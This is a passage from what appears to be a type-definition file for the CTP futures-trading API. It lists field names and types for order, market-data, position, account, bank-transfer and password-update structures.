"InsertTimeEnd": "string",
}
CThostFtdcExchangeOptionSelfCloseField = {
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"HedgeFlag": "char",
"OptSelfCloseFlag": "char",
"OptionSelfCloseLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OptionSelfCloseSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"ExecResult": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryOptionSelfCloseActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcExchangeOptionSelfCloseActionField = {
"ExchangeID": "string",
"OptionSelfCloseSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OptionSelfCloseLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ExchangeInstID": "string",
"OptSelfCloseFlag": "char",
}
CThostFtdcSyncDelaySwapField = {
"DelaySwapSeqNo": "string",
"BrokerID": "string",
"InvestorID": "string",
"FromCurrencyID": "string",
"FromAmount": "double",
"FromFrozenSwap": "double",
"FromRemainSwap": "double",
"ToCurrencyID": "string",
"ToAmount": "double",
}
CThostFtdcQrySyncDelaySwapField = {
"BrokerID": "string",
"DelaySwapSeqNo": "string",
}
CThostFtdcInvestUnitField = {
"BrokerID": "string",
"InvestorID": "string",
"InvestUnitID": "string",
"InvestorUnitName": "string",
"InvestorGroupID": "string",
"CommModelID": "string",
"MarginModelID": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcQryInvestUnitField = {
"BrokerID": "string",
"InvestorID": "string",
"InvestUnitID": "string",
}
CThostFtdcSecAgentCheckModeField = {
"InvestorID": "string",
"BrokerID": "string",
"CurrencyID": "string",
"BrokerSecAgentID": "string",
"CheckSelfAccount": "int",
}
CThostFtdcSecAgentTradeInfoField = {
"BrokerID": "string",
"BrokerSecAgentID": "string",
"InvestorID": "string",
"LongCustomerName": "string",
}
CThostFtdcMarketDataField = {
"TradingDay": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"ExchangeInstID": "string",
"LastPrice": "double",
"PreSettlementPrice": "double",
"PreClosePrice": "double",
"PreOpenInterest": "double",
"OpenPrice": "double",
"HighestPrice": "double",
"LowestPrice": "double",
"Volume": "int",
"Turnover": "double",
"OpenInterest": "double",
"ClosePrice": "double",
"SettlementPrice": "double",
"UpperLimitPrice": "double",
"LowerLimitPrice": "double",
"PreDelta": "double",
"CurrDelta": "double",
"UpdateTime": "string",
"UpdateMillisec": "int",
"ActionDay": "string",
}
CThostFtdcMarketDataBaseField = {
"TradingDay": "string",
"PreSettlementPrice": "double",
"PreClosePrice": "double",
"PreOpenInterest": "double",
"PreDelta": "double",
}
CThostFtdcMarketDataStaticField = {
"OpenPrice": "double",
"HighestPrice": "double",
"LowestPrice": "double",
"ClosePrice": "double",
"UpperLimitPrice": "double",
"LowerLimitPrice": "double",
"SettlementPrice": "double",
"CurrDelta": "double",
}
CThostFtdcMarketDataLastMatchField = {
"LastPrice": "double",
"Volume": "int",
"Turnover": "double",
"OpenInterest": "double",
}
CThostFtdcMarketDataBestPriceField = {
"BidPrice1": "double",
"BidVolume1": "int",
"AskPrice1": "double",
"AskVolume1": "int",
}
CThostFtdcMarketDataBid23Field = {
"BidPrice2": "double",
"BidVolume2": "int",
"BidPrice3": "double",
"BidVolume3": "int",
}
CThostFtdcMarketDataAsk23Field = {
"AskPrice2": "double",
"AskVolume2": "int",
"AskPrice3": "double",
"AskVolume3": "int",
}
CThostFtdcMarketDataBid45Field = {
"BidPrice4": "double",
"BidVolume4": "int",
"BidPrice5": "double",
"BidVolume5": "int",
}
CThostFtdcMarketDataAsk45Field = {
"AskPrice4": "double",
"AskVolume4": "int",
"AskPrice5": "double",
"AskVolume5": "int",
}
CThostFtdcMarketDataUpdateTimeField = {
"InstrumentID": "string",
"UpdateTime": "string",
"UpdateMillisec": "int",
"ActionDay": "string",
}
CThostFtdcMarketDataExchangeField = {
"ExchangeID": "string",
}
CThostFtdcSpecificInstrumentField = {
"InstrumentID": "string",
}
CThostFtdcInstrumentStatusField = {
"ExchangeID": "string",
"ExchangeInstID": "string",
"SettlementGroupID": "string",
"InstrumentID": "string",
"InstrumentStatus": "char",
"TradingSegmentSN": "int",
"EnterTime": "string",
"EnterReason": "char",
}
CThostFtdcQryInstrumentStatusField = {
"ExchangeID": "string",
"ExchangeInstID": "string",
}
CThostFtdcInvestorAccountField = {
"BrokerID": "string",
"InvestorID": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcPositionProfitAlgorithmField = {
"BrokerID": "string",
"AccountID": "string",
"Algorithm": "char",
"Memo": "string",
"CurrencyID": "string",
}
CThostFtdcDiscountField = {
"BrokerID": "string",
"InvestorRange": "char",
"InvestorID": "string",
"Discount": "double",
}
CThostFtdcQryTransferBankField = {
"BankID": "string",
"BankBrchID": "string",
}
CThostFtdcTransferBankField = {
"BankID": "string",
"BankBrchID": "string",
"BankName": "string",
"IsActive": "int",
}
CThostFtdcQryInvestorPositionDetailField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcInvestorPositionDetailField = {
"InstrumentID": "string",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"Direction": "char",
"OpenDate": "string",
"TradeID": "string",
"Volume": "int",
"OpenPrice": "double",
"TradingDay": "string",
"SettlementID": "int",
"TradeType": "char",
"CombInstrumentID": "string",
"ExchangeID": "string",
"CloseProfitByDate": "double",
"CloseProfitByTrade": "double",
"PositionProfitByDate": "double",
"PositionProfitByTrade": "double",
"Margin": "double",
"ExchMargin": "double",
"MarginRateByMoney": "double",
"MarginRateByVolume": "double",
"LastSettlementPrice": "double",
"SettlementPrice": "double",
"CloseVolume": "int",
"CloseAmount": "double",
"InvestUnitID": "string",
}
CThostFtdcTradingAccountPasswordField = {
"BrokerID": "string",
"AccountID": "string",
"Password": "string",
"CurrencyID": "string",
}
CThostFtdcMDTraderOfferField = {
"ExchangeID": "string",
"TraderID": "string",
"ParticipantID": "string",
"Password": "string",
"InstallID": "int",
"OrderLocalID": "string",
"TraderConnectStatus": "char",
"ConnectRequestDate": "string",
"ConnectRequestTime": "string",
"LastReportDate": "string",
"LastReportTime": "string",
"ConnectDate": "string",
"ConnectTime": "string",
"StartDate": "string",
"StartTime": "string",
"TradingDay": "string",
"BrokerID": "string",
"MaxTradeID": "string",
"MaxOrderMessageReference": "string",
}
CThostFtdcQryMDTraderOfferField = {
"ExchangeID": "string",
"ParticipantID": "string",
"TraderID": "string",
}
CThostFtdcQryNoticeField = {
"BrokerID": "string",
}
CThostFtdcNoticeField = {
"BrokerID": "string",
"Content": "string",
"SequenceLabel": "string",
}
CThostFtdcUserRightField = {
"BrokerID": "string",
"UserID": "string",
"UserRightType": "char",
"IsForbidden": "int",
}
CThostFtdcQrySettlementInfoConfirmField = {
"BrokerID": "string",
"InvestorID": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcLoadSettlementInfoField = {
"BrokerID": "string",
}
CThostFtdcBrokerWithdrawAlgorithmField = {
"BrokerID": "string",
"WithdrawAlgorithm": "char",
"UsingRatio": "double",
"IncludeCloseProfit": "char",
"AllWithoutTrade": "char",
"AvailIncludeCloseProfit": "char",
"IsBrokerUserEvent": "int",
"CurrencyID": "string",
"FundMortgageRatio": "double",
"BalanceAlgorithm": "char",
}
CThostFtdcTradingAccountPasswordUpdateV1Field = {
"BrokerID": "string",
"InvestorID": "string",
"OldPassword": "string",
"NewPassword": "string",
}
CThostFtdcTradingAccountPasswordUpdateField = {
"BrokerID": "string",
"AccountID": "string",
"OldPassword": "string",
"NewPassword": "string",
"CurrencyID": "string",
}
CThostFtdcQryCombinationLegField = {
"CombInstrumentID": "string",
"LegID": "int",
"LegInstrumentID": "string",
}
CThostFtdcQrySyncStatusField = {
"TradingDay": "string",
}
CThostFtdcCombinationLegField = {
"CombInstrumentID": "string",
"LegID": "int",
"LegInstrumentID": "string",
"Direction": "char",
"LegMultiple": "int",
"ImplyLevel": "int",
}
CThostFtdcSyncStatusField = {
"TradingDay": "string",
"DataSyncStatus": "char",
}
CThostFtdcQryLinkManField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcLinkManField = {
"BrokerID": "string",
"InvestorID": "string",
"PersonType": "char",
"IdentifiedCardType": "char",
"IdentifiedCardNo": "string",
"PersonName": "string",
"Telephone": "string",
"Address": "string",
"ZipCode": "string",
"Priority": "int",
"UOAZipCode": "string",
"PersonFullName": "string",
}
CThostFtdcQryBrokerUserEventField = {
"BrokerID": "string",
"UserID": "string",
"UserEventType": "char",
}
CThostFtdcBrokerUserEventField = {
"BrokerID": "string",
"UserID": "string",
"UserEventType": "char",
"EventSequenceNo": "int",
"EventDate": "string",
"EventTime": "string",
"UserEventInfo": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcQryContractBankField = {
"BrokerID": "string",
"BankID": "string",
"BankBrchID": "string",
}
CThostFtdcContractBankField = {
"BrokerID": "string",
"BankID": "string",
"BankBrchID": "string",
"BankName": "string",
}
CThostFtdcInvestorPositionCombineDetailField = {
"TradingDay": "string",
"OpenDate": "string",
"ExchangeID": "string",
"SettlementID": "int",
"BrokerID": "string",
"InvestorID": "string",
"ComTradeID": "string",
"TradeID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"Direction": "char",
"TotalAmt": "int",
"Margin": "double",
"ExchMargin": "double",
"MarginRateByMoney": "double",
"MarginRateByVolume": "double",
"LegID": "int",
"LegMultiple": "int",
"CombInstrumentID": "string",
"TradeGroupID": "int",
"InvestUnitID": "string",
}
CThostFtdcParkedOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"UserForceClose": "int",
"ExchangeID": "string",
"ParkedOrderID": "string",
"UserType": "char",
"Status": "char",
"ErrorID": "int",
"ErrorMsg": "string",
"IsSwapOrder": "int",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcParkedOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"OrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"UserID": "string",
"InstrumentID": "string",
"ParkedOrderActionID": "string",
"UserType": "char",
"Status": "char",
"ErrorID": "int",
"ErrorMsg": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryParkedOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryParkedOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcRemoveParkedOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"ParkedOrderID": "string",
"InvestUnitID": "string",
}
CThostFtdcRemoveParkedOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ParkedOrderActionID": "string",
"InvestUnitID": "string",
}
CThostFtdcInvestorWithdrawAlgorithmField = {
"BrokerID": "string",
"InvestorRange": "char",
"InvestorID": "string",
"UsingRatio": "double",
"CurrencyID": "string",
"FundMortgageRatio": "double",
}
CThostFtdcQryInvestorPositionCombineDetailField = {
"BrokerID": "string",
"InvestorID": "string",
"CombInstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcMarketDataAveragePriceField = {
"AveragePrice": "double",
}
CThostFtdcVerifyInvestorPasswordField = {
"BrokerID": "string",
"InvestorID": "string",
"Password": "string",
}
CThostFtdcUserIPField = {
"BrokerID": "string",
"UserID": "string",
"IPAddress": "string",
"IPMask": "string",
"MacAddress": "string",
}
CThostFtdcTradingNoticeInfoField = {
"BrokerID": "string",
"InvestorID": "string",
"SendTime": "string",
"FieldContent": "string",
"SequenceSeries": "int",
"SequenceNo": "int",
"InvestUnitID": "string",
}
CThostFtdcTradingNoticeField = {
"BrokerID": "string",
"InvestorRange": "char",
"InvestorID": "string",
"SequenceSeries": "int",
"UserID": "string",
"SendTime": "string",
"SequenceNo": "int",
"FieldContent": "string",
"InvestUnitID": "string",
}
CThostFtdcQryTradingNoticeField = {
"BrokerID": "string",
"InvestorID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryErrOrderField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcErrOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"UserForceClose": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"IsSwapOrder": "int",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcErrorConditionalOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"OrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OrderSysID": "string",
"OrderSource": "char",
"OrderStatus": "char",
"OrderType": "char",
"VolumeTraded": "int",
"VolumeTotal": "int",
"InsertDate": "string",
"InsertTime": "string",
"ActiveTime": "string",
"SuspendTime": "string",
"UpdateTime": "string",
"CancelTime": "string",
"ActiveTraderID": "string",
"ClearingPartID": "string",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"UserForceClose": "int",
"ActiveUserID": "string",
"BrokerOrderSeq": "int",
"RelativeOrderSysID": "string",
"ZCETotalTradedVolume": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"IsSwapOrder": "int",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryErrOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcErrOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"OrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryExchangeSequenceField = {
"ExchangeID": "string",
}
CThostFtdcExchangeSequenceField = {
"ExchangeID": "string",
"SequenceNo": "int",
"MarketStatus": "char",
}
CThostFtdcQueryMaxOrderVolumeWithPriceField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"Direction": "char",
"OffsetFlag": "char",
"HedgeFlag": "char",
"MaxVolume": "int",
"Price": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryBrokerTradingParamsField = {
"BrokerID": "string",
"InvestorID": "string",
"CurrencyID": "string",
"AccountID": "string",
}
CThostFtdcBrokerTradingParamsField = {
"BrokerID": "string",
"InvestorID": "string",
"MarginPriceType": "char",
"Algorithm": "char",
"AvailIncludeCloseProfit": "char",
"CurrencyID": "string",
"OptionRoyaltyPriceType": "char",
"AccountID": "string",
}
CThostFtdcQryBrokerTradingAlgosField = {
"BrokerID": "string",
"ExchangeID": "string",
"InstrumentID": "string",
}
CThostFtdcBrokerTradingAlgosField = {
"BrokerID": "string",
"ExchangeID": "string",
"InstrumentID": "string",
"HandlePositionAlgoID": "char",
"FindMarginRateAlgoID": "char",
"HandleTradingAccountAlgoID": "char",
}
CThostFtdcQueryBrokerDepositField = {
"BrokerID": "string",
"ExchangeID": "string",
}
CThostFtdcBrokerDepositField = {
"TradingDay": "string",
"BrokerID": "string",
"ParticipantID": "string",
"ExchangeID": "string",
"PreBalance": "double",
"CurrMargin": "double",
"CloseProfit": "double",
"Balance": "double",
"Deposit": "double",
"Withdraw": "double",
"Available": "double",
"Reserve": "double",
"FrozenMargin": "double",
}
CThostFtdcQryCFMMCBrokerKeyField = {
"BrokerID": "string",
}
CThostFtdcCFMMCBrokerKeyField = {
"BrokerID": "string",
"ParticipantID": "string",
"CreateDate": "string",
"CreateTime": "string",
"KeyID": "int",
"CurrentKey": "string",
"KeyKind": "char",
}
CThostFtdcCFMMCTradingAccountKeyField = {
"BrokerID": "string",
"ParticipantID": "string",
"AccountID": "string",
"KeyID": "int",
"CurrentKey": "string",
}
CThostFtdcQryCFMMCTradingAccountKeyField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcBrokerUserOTPParamField = {
"BrokerID": "string",
"UserID": "string",
"OTPVendorsID": "string",
"SerialNumber": "string",
"AuthKey": "string",
"LastDrift": "int",
"LastSuccess": "int",
"OTPType": "char",
}
CThostFtdcManualSyncBrokerUserOTPField = {
"BrokerID": "string",
"UserID": "string",
"OTPType": "char",
"FirstOTP": "string",
"SecondOTP": "string",
}
CThostFtdcCommRateModelField = {
"BrokerID": "string",
"CommModelID": "string",
"CommModelName": "string",
}
CThostFtdcQryCommRateModelField = {
"BrokerID": "string",
"CommModelID": "string",
}
CThostFtdcMarginModelField = {
"BrokerID": "string",
"MarginModelID": "string",
"MarginModelName": "string",
}
CThostFtdcQryMarginModelField = {
"BrokerID": "string",
"MarginModelID": "string",
}
CThostFtdcEWarrantOffsetField = {
"TradingDay": "string",
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
"InstrumentID": "string",
"Direction": "char",
"HedgeFlag": "char",
"Volume": "int",
"InvestUnitID": "string",
}
CThostFtdcQryEWarrantOffsetField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInvestorProductGroupMarginField = {
"BrokerID": "string",
"InvestorID": "string",
"ProductGroupID": "string",
"HedgeFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcInvestorProductGroupMarginField = {
"ProductGroupID": "string",
"BrokerID": "string",
"InvestorID": "string",
"TradingDay": "string",
"SettlementID": "int",
"FrozenMargin": "double",
"LongFrozenMargin": "double",
"ShortFrozenMargin": "double",
"UseMargin": "double",
"LongUseMargin": "double",
"ShortUseMargin": "double",
"ExchMargin": "double",
"LongExchMargin": "double",
"ShortExchMargin": "double",
"CloseProfit": "double",
"FrozenCommission": "double",
"Commission": "double",
"FrozenCash": "double",
"CashIn": "double",
"PositionProfit": "double",
"OffsetAmount": "double",
"LongOffsetAmount": "double",
"ShortOffsetAmount": "double",
"ExchOffsetAmount": "double",
"LongExchOffsetAmount": "double",
"ShortExchOffsetAmount": "double",
"HedgeFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQueryCFMMCTradingAccountTokenField = {
"BrokerID": "string",
"InvestorID": "string",
"InvestUnitID": "string",
}
CThostFtdcCFMMCTradingAccountTokenField = {
"BrokerID": "string",
"ParticipantID": "string",
"AccountID": "string",
"KeyID": "int",
"Token": "string",
}
CThostFtdcQryProductGroupField = {
"ProductID": "string",
"ExchangeID": "string",
}
CThostFtdcProductGroupField = {
"ProductID": "string",
"ExchangeID": "string",
"ProductGroupID": "string",
}
CThostFtdcBulletinField = {
"ExchangeID": "string",
"TradingDay": "string",
"BulletinID": "int",
"SequenceNo": "int",
"NewsType": "string",
"NewsUrgency": "char",
"SendTime": "string",
"Abstract": "string",
"ComeFrom": "string",
"Content": "string",
"URLLink": "string",
"MarketID": "string",
}
CThostFtdcQryBulletinField = {
"ExchangeID": "string",
"BulletinID": "int",
"SequenceNo": "int",
"NewsType": "string",
"NewsUrgency": "char",
}
CThostFtdcReqOpenAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"CashExchangeCode": "char",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"TID": "int",
"UserID": "string",
"LongCustomerName": "string",
}
CThostFtdcReqCancelAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"CashExchangeCode": "char",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"TID": "int",
"UserID": "string",
"LongCustomerName": "string",
}
CThostFtdcReqChangeAccountField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"Gender": "char",
"CountryCode": "string",
"CustType": "char",
"Address": "string",
"ZipCode": "string",
"Telephone": "string",
"MobilePhone": "string",
"Fax": "string",
"EMail": "string",
"MoneyAccountStatus": "char",
"BankAccount": "string",
"BankPassWord": "string",
"NewBankAccount": "string",
"NewBankPassWord": "string",
"AccountID": "string",
"Password": "string",
"BankAccType": "char",
"InstallID": "int",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"BrokerIDByBank": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"TID": "int",
"Digest": "string",
"LongCustomerName": "string",
}
CThostFtdcReqTransferField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"FutureSerial": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"TradeAmount": "double",
"FutureFetchAmount": "double",
"FeePayFlag": "char",
"CustFee": "double",
"BrokerFee": "double",
"Message": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"TransferStatus": "char",
"LongCustomerName": "string",
}
CThostFtdcRspTransferField = {
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"FutureSerial": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"TradeAmount": "double",
"FutureFetchAmount": "double",
"FeePayFlag": "char",
"CustFee": "double",
"BrokerFee": "double",
"Message": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"TransferStatus": "char",
"ErrorID": "int",
"ErrorMsg": "string",
"LongCustomerName": "string",
}
CThostFtdcReqRepealField = {
"RepealTimeInterval": "int",
"RepealedTimes": "int",
"BankRepealFlag": "char",
"BrokerRepealFlag": "char",
"PlateRepealSerial": "int",
"BankRepealSerial": "string",
"FutureRepealSerial": "int",
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"FutureSerial": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"TradeAmount": "double",
"FutureFetchAmount": "double",
"FeePayFlag": "char",
"CustFee": "double",
"BrokerFee": "double",
"Message": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"TransferStatus": "char",
"LongCustomerName": "string",
}
CThostFtdcRspRepealField = {
"RepealTimeInterval": "int",
"RepealedTimes": "int",
"BankRepealFlag": "char",
"BrokerRepealFlag": "char",
"PlateRepealSerial": "int",
"BankRepealSerial": "string",
"FutureRepealSerial": "int",
"TradeCode": "string",
"BankID": "string",
"BankBranchID": "string",
"BrokerID": "string",
"BrokerBranchID": "string",
"TradeDate": "string",
"TradeTime": "string",
"BankSerial": "string",
"TradingDay": "string",
"PlateSerial": "int",
"LastFragment": "char",
"SessionID": "int",
"CustomerName": "string",
"IdCardType": "char",
"IdentifiedCardNo": "string",
"CustType": "char",
"BankAccount": "string",
"BankPassWord": "string",
"AccountID": "string",
"Password": "string",
"InstallID": "int",
"FutureSerial": "int",
"UserID": "string",
"VerifyCertNoFlag": "char",
"CurrencyID": "string",
"TradeAmount": "double",
"FutureFetchAmount": "double",
"FeePayFlag": "char",
"CustFee": "double",
"BrokerFee": "double",
"Message": "string",
"Digest": "string",
"BankAccType": "char",
"DeviceID": "string",
"BankSecuAccType": "char",
"BrokerIDByBank": "string",
"BankSecuAcc": "string",
"BankPwdFlag": "char",
"SecuPwdFlag": "char",
"OperNo": "string",
"RequestID": "int",
"TID": "int",
"TransferStatus": "char",
